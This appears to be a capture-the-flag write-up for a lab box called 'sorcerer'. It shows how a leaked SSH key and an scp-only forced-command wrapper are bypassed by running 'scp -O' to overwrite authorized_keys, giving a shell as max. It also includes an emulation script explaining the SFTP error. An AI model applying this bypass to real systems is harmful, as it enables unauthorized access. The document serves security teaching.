SCP
A backup of the max user's home directory was found on the web server listening on port 7742.
It included the user's SSH files as well as an interesting Bash script that appears to be wired to inbound SSH connections for the max user.
authorized_keys
┌──(kali㉿kali)-[~/…/sorcerer/7742/home/max]
└─$ cat .ssh/authorized_keys
no-port-forwarding,no-X11-forwarding,no-agent-forwarding,no-pty,command="/home/max/scp_wrapper.sh" ssh-rsa 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 max@sorcerer
The authorized_keys entry sets a forced command: whenever this key is used to authenticate as max, sshd ignores whatever the client asked to run and executes /home/max/scp_wrapper.sh instead. The client's requested command is only exposed to that script through the SSH_ORIGINAL_COMMAND environment variable. The remaining options disable port, X11 and agent forwarding and deny a PTY, so this key does not give an interactive shell on its own.
scp_wrapper.sh
┌──(kali㉿kali)-[~/…/sorcerer/7742/home/max]
└─$ cat scp_wrapper.sh
#!/bin/bash
case $SSH_ORIGINAL_COMMAND in
'scp'*)
$SSH_ORIGINAL_COMMAND
;;
*)
echo "ACCESS DENIED."
scp
;;
esac
The script dispatches on the command the client originally requested:
- If SSH_ORIGINAL_COMMAND starts with scp, it is executed as-is (unquoted, so it is subject to word splitting and globbing).
- Otherwise, "ACCESS DENIED." is printed to stdout and a bare scp with no arguments is run, which only prints its usage message and fails.
With max's valid SSH private key in hand, this logic should be exploitable: the wrapper allows any scp command, including one that writes to max's own authorized_keys file.
SCP Error
┌──(kali㉿kali)-[~/…/sorcerer/7742/home/max]
└─$ scp -i .ssh/id_rsa .ssh/id_rsa.pub max@$IP:/home/max/.ssh/authorized_keys
scp: Received message too long 1094927173
scp: Ensure the remote shell produces no output for non-interactive sessions.
Attempting to overwrite the authorized_keys file with scp fails with the two errors above.
Solution
Searching on the first error message turned up an explanation, and the second one pointed at the fix.
Since OpenSSH 9.0, scp uses the SFTP protocol by default, so the client never runs a remote scp command at all; it requests the sftp subsystem instead. That request does not start with scp, so the wrapper takes its deny branch and writes "ACCESS DENIED." to stdout, which is the same channel the SFTP client is reading. The client interprets the first four bytes, ACCE, as a big-endian packet length: 0x41434345 = 1094927173, far above the protocol's maximum message size, hence "Received message too long". The second line is OpenSSH's hint for exactly this situation (a forced command or shell profile printing to stdout).
The -O flag forces the legacy SCP protocol. In that mode the client runs scp -t <path> on the remote side, which matches the wrapper's 'scp'* pattern and is executed.
┌──(kali㉿kali)-[~/…/sorcerer/7742/home/max]
└─$ scp -O -i .ssh/id_rsa .ssh/id_rsa.pub max@$IP:/home/max/.ssh/authorized_keys
id_rsa.pub 100% 738 37.3KB/s 00:00
It works. The uploaded file replaces max's authorized_keys with the bare public key, so the forced command and the no-pty restriction no longer apply to the same private key.
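The following script is an added example, not part of the original write-up or of the target box: it emulates the server side of the forced command from max's authorized_keys and shows what an OpenSSH client sees in SFTP mode versus legacy (-O) mode, including why the SFTP attempt reports length 1094927173. The real scp binary is replaced by a stub that only reports its arguments, and the subsystem command string the SFTP client triggers is an assumption (it depends on the Subsystem line in sshd_config, but it never begins with "scp").

```shell
#!/bin/sh
# Added example (not from the write-up): emulate /home/max/scp_wrapper.sh
# against the two remote commands an OpenSSH scp client can issue.

# Stub standing in for /usr/bin/scp: reports the arguments it was given
# instead of transferring anything, so the script runs offline.
fake_scp() {
    printf 'scp invoked with: %s\n' "$*"
}

# Dispatch logic copied from scp_wrapper.sh, with scp replaced by the stub.
wrapper() {
    SSH_ORIGINAL_COMMAND=$1
    case $SSH_ORIGINAL_COMMAND in
        'scp'*)
            # The original runs $SSH_ORIGINAL_COMMAND unquoted; the same
            # word splitting and globbing is reproduced here on purpose.
            set -- $SSH_ORIGINAL_COMMAND
            shift               # drop the leading "scp" word, keep its arguments
            fake_scp "$@"
            ;;
        *)
            echo "ACCESS DENIED."   # stdout, i.e. straight into the SSH channel
            fake_scp                # bare scp, as in the original wrapper
            ;;
    esac
}

# What an SFTP client does with the first bytes it receives: it reads a
# 4-byte big-endian unsigned length before parsing anything else.
sftp_packet_len() {
    hex=$(printf '%.4s' "$1" | od -An -tx1 | tr -d ' \n')
    echo $((0x$hex))
}

# Modern scp (OpenSSH 9.0+) speaks SFTP: the client requests the sftp
# subsystem, so SSH_ORIGINAL_COMMAND is the subsystem command, not "scp".
SFTP_SUBSYSTEM='/usr/lib/openssh/sftp-server'   # assumed sshd_config value
reply=$(wrapper "$SFTP_SUBSYSTEM")
printf 'SFTP mode, wrapper output: %s\n' "$reply"
printf 'SFTP mode, length the client decodes from "ACCE": %s\n' "$(sftp_packet_len "$reply")"

# Legacy scp (scp -O) runs a sink-mode scp on the remote side; this
# matches the 'scp'* pattern and the wrapper executes it unchanged.
printf 'Legacy mode: %s\n' "$(wrapper 'scp -t /home/max/.ssh/authorized_keys')"
```

Run it with sh or bash; the decoded length matches the number in the scp error exactly, and the legacy-mode line shows the sink-side scp reaching the wrapper with the authorized_keys path intact. The weak point is the pattern itself: any command beginning with scp is accepted, so a key that was meant to allow file copies also allows rewriting the file that imposed the restriction.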
SSH
┌──(kali㉿kali)-[~/…/sorcerer/7742/home/max]
└─$ ssh -i .ssh/id_rsa max@$IP
max@sorcerer:~$ whoami
max
max@sorcerer:~$ hostname
sorcerer
max@sorcerer:~$ ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
3: ens192: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP group default qlen 1000
link/ether 00:50:56:9e:cb:57 brd ff:ff:ff:ff:ff:ff
inet 192.168.113.100/24 brd 192.168.113.255 scope global ens192
valid_lft forever preferred_lft forever
Initial foothold established on the target system as the max user by exploiting the SSH forced-command wrapper logic.